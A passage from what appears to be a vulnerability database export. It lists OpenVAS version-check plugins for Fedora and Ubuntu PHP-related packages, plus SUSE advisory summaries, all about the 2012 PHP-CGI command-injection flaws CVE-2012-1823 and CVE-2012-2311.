\"\";\n\nif(release == \"FC16\")\n{\n\n if 
((res = isrpmvuln(pkg:\"maniadrive\", rpm:\"maniadrive~1.2~32.fc16.5\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-11T11:07:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "Check for the Version of maniadrive", "modified": "2018-01-09T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:864253", "href": "http://plugins.openvas.org/nasl.php?oid=864253", "type": "openvas", "title": "Fedora Update for maniadrive FEDORA-2012-7586", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for maniadrive FEDORA-2012-7586\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"maniadrive on Fedora 16\";\ntag_insight = \"ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nervous\n gameplay (tracks almost never exceed one minute). 
Features: Complex car\n physics, Challenging "story mode", LAN and Internet mode, Live scores,\n Track editor, Dedicated server with HTTP interface and More than 30 blocks.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081286.html\");\n script_id(864253);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:26:44 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-7586\");\n script_name(\"Fedora Update for maniadrive FEDORA-2012-7586\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of maniadrive\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"maniadrive\", rpm:\"maniadrive~1.2~32.fc16.5\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": 
{"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "Ubuntu Update for php5 USN-1437-1", "modified": "2019-03-13T00:00:00", "published": "2012-05-08T00:00:00", "id": "OPENVAS:1361412562310841002", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841002", "type": "openvas", "title": "Ubuntu Update for php5 USN-1437-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1437_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for php5 USN-1437-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1437-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841002\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 12:37:35 +0530 (Tue, 08 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_xref(name:\"USN\", value:\"1437-1\");\n script_name(\"Ubuntu Update for php5 USN-1437-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.04 LTS|12\\.04 LTS|11\\.10|11\\.04|8\\.04 LTS)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1437-1\");\n script_tag(name:\"affected\", value:\"php5 on Ubuntu 12.04 LTS,\n Ubuntu 11.10,\n Ubuntu 11.04,\n Ubuntu 10.04 LTS,\n Ubuntu 8.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"It was discovered that PHP, when used as a stand alone CGI processor\n for the Apache Web Server, did not properly parse and filter query\n strings. 
This could allow a remote attacker to execute arbitrary code\n running with the privilege of the web server. Configurations using\n mod_php5 and FastCGI were not vulnerable.\n\n This update addresses the issue when the PHP CGI interpreter\n is configured using mod_cgi and mod_actions as described\n in /usr/share/doc/php5-cgi/README.Debian.gz. However,\n if an alternate configuration is used to enable PHP CGI\n processing, it should be reviewed to ensure that command line\n arguments cannot be passed to the PHP interpreter. Please see\n the references for more details and potential mitigation approaches.\");\n\n script_xref(name:\"URL\", value:\"http://people.canonical.com/~ubuntu-security/cve/2012/CVE-2012-2311.html\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.2-1ubuntu4.15\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.10-1ubuntu3.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.6-13ubuntu3.7\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.5-1ubuntu7.8\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 
LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.4-2ubuntu5.24\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "The remote host is missing an update for the 'php-eaccelerator' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:1361412562310864261", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864261", "type": "openvas", "title": "Fedora Update for php-eaccelerator FEDORA-2012-7586", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php-eaccelerator FEDORA-2012-7586\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081285.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864261\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:27:52 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-7586\");\n script_name(\"Fedora Update for php-eaccelerator FEDORA-2012-7586\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php-eaccelerator'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"php-eaccelerator on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"php-eaccelerator\", rpm:\"php-eaccelerator~0.9.6.1~9.fc16.5\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:1361412562310864259", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864259", "type": "openvas", "title": "Fedora Update for php-eaccelerator FEDORA-2012-7567", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php-eaccelerator FEDORA-2012-7567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081335.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864259\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:27:03 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-7567\");\n script_name(\"Fedora Update for php-eaccelerator FEDORA-2012-7567\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php-eaccelerator'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"php-eaccelerator on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"php-eaccelerator\", rpm:\"php-eaccelerator~0.9.6.1~9.fc15.5\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-08T12:57:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "Check for the Version of maniadrive", "modified": "2018-01-08T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:864256", "href": "http://plugins.openvas.org/nasl.php?oid=864256", "type": "openvas", "title": "Fedora Update for maniadrive FEDORA-2012-7567", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for maniadrive FEDORA-2012-7567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"maniadrive on Fedora 15\";\ntag_insight = \"ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nervous\n gameplay (tracks almost never exceed one minute). 
Features: Complex car\n physics, Challenging "story mode", LAN and Internet mode, Live scores,\n Track editor, Dedicated server with HTTP interface and More than 30 blocks.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081334.html\");\n script_id(864256);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:26:52 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-7567\");\n script_name(\"Fedora Update for maniadrive FEDORA-2012-7567\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of maniadrive\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"maniadrive\", rpm:\"maniadrive~1.2~32.fc15.5\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": 
{"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:07:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "Check for the Version of php-eaccelerator", "modified": "2018-01-05T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:864259", "href": "http://plugins.openvas.org/nasl.php?oid=864259", "type": "openvas", "title": "Fedora Update for php-eaccelerator FEDORA-2012-7567", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php-eaccelerator FEDORA-2012-7567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"php-eaccelerator on Fedora 15\";\ntag_insight = \"eAccelerator is a further development of the MMCache PHP Accelerator & Encoder.\n It increases performance of PHP scripts by caching them in compiled state, so\n that the overhead of compiling is almost completely eliminated.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081335.html\");\n script_id(864259);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:27:03 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-7567\");\n script_name(\"Fedora Update for php-eaccelerator FEDORA-2012-7567\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php-eaccelerator\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : 
tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"php-eaccelerator\", rpm:\"php-eaccelerator~0.9.6.1~9.fc15.5\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:1361412562310864257", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864257", "type": "openvas", "title": "Fedora Update for php FEDORA-2012-7567", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2012-7567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081333.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864257\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:26:57 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-7567\");\n script_name(\"Fedora Update for php FEDORA-2012-7567\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"php on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"php\", rpm:\"php~5.3.13~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:39:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "when used in CGI mode remote attackers could inject command\n line arguments to php\n\n", "edition": 1, "modified": "2012-05-07T16:08:55", "published": "2012-05-07T16:08:55", "id": "OPENSUSE-SU-2012:0590-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00002.html", "title": "update for php5 (critical)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "description": "This update fixes several security issues in PHP5:\n\n * CVE-2012-1172: A directory traversal bug has been\n fixed in PHP5\n * CVE-2012-1823, CVE-2012-2311: A command injection was\n possible when PHP5 was operated in CGI mode using\n commandline options. 
This problem does not affect PHP5 in\n the normal Apache module mode setup.\n", "edition": 1, "modified": "2012-05-09T22:08:16", "published": "2012-05-09T22:08:16", "id": "SUSE-SU-2012:0604-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00011.html", "title": "Security update for PHP5 (critical)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:51:43", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "description": "This update fixes several security issues in PHP5:\n\n * CVE-2012-1172: A directory traversal bug has been\n fixed in php5.\n * CVE-2012-1823, CVE-2012-2311: A command injection was\n possible when PHP5 was operated in CGI mode using\n commandline options. This problem does not affect PHP5 in\n the normal Apache module mode setup.\n * Also a pack/unpacking bug on big endian 64bit\n architectures (ppc64 and s390x) has been fixed. bnc#753778\n", "edition": 1, "modified": "2012-05-09T02:08:18", "published": "2012-05-09T02:08:18", "id": "SUSE-SU-2012:0598-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00007.html", "type": "suse", "title": "Security update for PHP5 (critical)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:38:36", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "description": "This update fixes several security issues in PHP5:\n\n * CVE-2012-1172: A directory traversal bug has been\n fixed in PHP5.\n * CVE-2012-1823, CVE-2012-2311: A command injection was\n possible when PHP5 was operated in CGI mode using\n commandline options. This problem does not affect PHP5 in\n the normal apache module mode setup.\n * Also a pack/unpacking bug on big endian 64bit\n architectures (ppc64 and s390x) has been fixed. 
